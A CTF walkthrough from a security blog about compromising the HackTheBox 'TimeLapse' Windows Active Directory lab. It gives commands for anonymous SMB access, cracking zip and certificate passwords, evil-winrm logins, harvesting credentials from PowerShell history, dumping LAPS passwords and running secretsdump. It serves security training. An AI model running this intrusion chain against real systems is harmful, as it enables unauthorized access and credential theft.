TimeLapse HackTheBox WalkThrough

TimeLapse HackTheBox walkthrough

This is TimeLapse HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted TimeLapse HackTheBox machine. Before starting let us know something about this machine. It is Windows OS box with IP address and difficulty easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and make sure your connectivity with TimeLapse machine by pinging its IP If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability assessment also. I have used $ nmap [a popular port scanner] for this task and the result is given below: –


$ sudo nmap -p- --min-rate=10000 -oN tcpfull-scan.nmap
$ cat tcpfull-scan.nmap
Full port scan during TimeLapse HackTheBox walkthrough
$ sudo nmap -p53,88,135,139,389,445,464,593,636,3269,5986,9389 -sC -sV -oN tcpScript-scan.nmap
$ cat tcpScript-scan.nmap
TCP Script scan during TimeLapse HackTheBox walkthrough

Full port scan with $ nmap found port no. 53, 88, 135, 139, 389, 445, 464, 593, 636, 3269, 5986 & 9389 as open. Checking the services on ports 53, 88, 389 & 389 it appears to be an Active Directory environment. Among these ports, the notable ports are 53, 88, 135, 139, 389, 445 & 5986 since the services on these ports are well known. DNS Server is running on port 53, Kerberos on 88, Microsoft RPC on 135, SMB on 139 & 445, LDAP on 389 & 636 and winrm on port 5986 are running. We will use port 5986 for remote logging whenever we will get any credential.

As usual, I started my enumeration from port 139 & 445 as SMB service is running on these ports. If Null Session will be allowed, we will get some information to dig deeper into it. Null Session is allowed here. Let us connect with the open share and download all the files from the shared folder. After downloading all the files found a zip file named winrm_backup.zip.

$ smbclient -U "" -L //
$ smbclient //
smb: \> cd Dev\
smb: \Dev\> get winrm_backup.zip
smb: \Dev\> exit
Listing the shares of Timelapse htb box during its walkthrough

The zip file is password protected.

$ unzip winrm_backup.zip
Unzipping winrm_backup.zip file during TimeLapse HackTheBox walkthrough

Cracking Password

I have used $ johntheripper [an offline password cracker] and wordlist rockyou.txt to crack the password of this file.

$ zip2john winrm_backup.zip > zip.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Cracking zip password of winrm_backup.zip file

The cracked password is supremelegacy. On unzipping winrm_backup.zip found a pfx file inside it.

A pfx file is an archive file. It contains both public key as well as private key and sometimes contains a chain of keys responsible for trustworthiness of the certificate. All the keys inside any pfx file may or may not be password protected. A pfx file can be used for TLS/SSL on web site, for digitally signing messages or authorization tokens, or for authenticating to a partner system.

Our pfx file is password protected. Tried to login with some default password like admin, password, root, TimeLapse, etc. but none worked. So, we have to crack the password of this file too.

$ unzip winrm_backup.zip -d winrm_backup
$ cd winrm_backup/
$ open legacyy_dev_auth.pfx
Open pfx file after unzipping the archive file

To crack the password I have used the same tool $ johntheripper [an offline password cracker] with the same wordlist rockyou.txt [rockyou.txt is present by default in the directory /usr/share/wordlists/ in Kali and Parrot OS.]

$ pfx2john legacyy_dev_auth.pfx > legacy.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt legacy.hash
Cracking pfx password of legacyy_dev_auth file

The cracked password is thuglegacy. Since pfx file is an archive file and contains public key and private key so let us extract both the keys from this file. We can use $ openssl tool for this purpose. I have followed this article from IBM documentation for the same.

$ cd winrm_backup/
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key

Enter Import Password: thuglegacy

Enter PEM pass phrase: thuglegacy

Verifying – Enter PEM pass phrase: thuglegacy

$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out key.crt

Enter Import Password: thuglegacy

$ ls
Extracting key and certificate from pfx file

Now we have both, the certificate containing public key and the private key of the SSL. Also, we have port no. 5986 open on the server so we can use $ evil-winrm to connect TimeLapse machine using these keys. Let us remotely connect to the server.

Getting User Shell

$ evil-winrm -i -u " " -p "thuglegacy" -c key.crt -k private.key -S
$ whoami
Getting user shell using evil-winrm in TimeLapse HackTheBox walkthrough

We have successfully logged in into the TimeLapse box. Let us capture user flag.

Capture User Flag

$ cat \Users\legacyy\Desktop\user.txt
Capturing user flag in timelapse htb

Privilege Escalation

To escalate the privilege to root we have to first find a Privilege Escalation Vector using, which we can perform, privilege escalation. We can find PrivEsc vector either manually or using some post exploitation enumeration scripts like winPEAS, PowerUp.ps1, and there are a lot more. This time I will go with winPEAS viz. script enumeration technique.

Finding PrivEsc Vector

winPEAS found PowerShell Console history file named ConsoleHost_hostory.txt inside the directory C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\.

ConsoleHost_history.txt file is located at the location %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\. It holds history of recent Windows PowerShell commands executed by particular user. This file is same as .bash_history file in Linux as both these files contain the recent commands used by the particular user.

WinPEAS result during TimeLapse HackTheBox walkthrough

On checking the content of this file found some Ps-remoting commands already used on this machine. The used user is svc_deploy and the user password is E3R$Q62^12p7PLlC%KWaxuaV.

$ cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Content of ConsoleHost_history.txt file

When I checked the details of user svg_deploy then found that svg_deploy is part of LAPS_Readers group.

$ net user svc_deploy
svc_deploy user details found using net user command

Since svg_deploy is the member of LAPS_Readers group, therefore we can use LAPSDumber tool to dump every LAPS password the account has access to read, within the entire domain. To use LAPSDumber follow the below steps.

$ git clone https://github.com/n00py/LAPSDumper.git
$ cd LAPSDumper/
$ python3 laps.py -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d 'timelapse.htb'
Downloading and using LAPSDumper to extract password

The extracted local admin password is 5cz8(5ZNvaONZ4u1rio)b#/.. When I tried to login into admin account using the credential Administrator : 5cz8(5ZNvaONZ4u1rio)b#/. I would easily logged in as local admin. So here, our Privilege Escalation Vector is Privilege Escalation by reusing credential stored in PowerShell History.

Since winrm port [5986] is open so let us use the above credential to get admin access using $ evil-winrm.

Getting Admin Shell

$ evil-winrm -u administrator -p '5cz8(5ZNvaONZ4u1rio)b#/.' -i -S
$ whoami
Getting root shell during TimeLapse HackTheBox walkthrough

We have successfully logged in into local admin account. Let us capture root flag.

Capture Root Flag

$ Get-Childitem -Path C:\Users -Include root.txt -Recurse
$ cat C:\Users\TRX\Desktop\root.txt
Capturing root flag in timelapse htb

Dumping Root Hash

$ impacket-secretsdump [email protected]
Dumping root hash using impacket-secretsdump module

This was how I rooted to TimeLapse HackTheBox machine. Learnt a lot during this walkthrough. Hope you have also learnt some new things. Thanks for reading this writeup. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/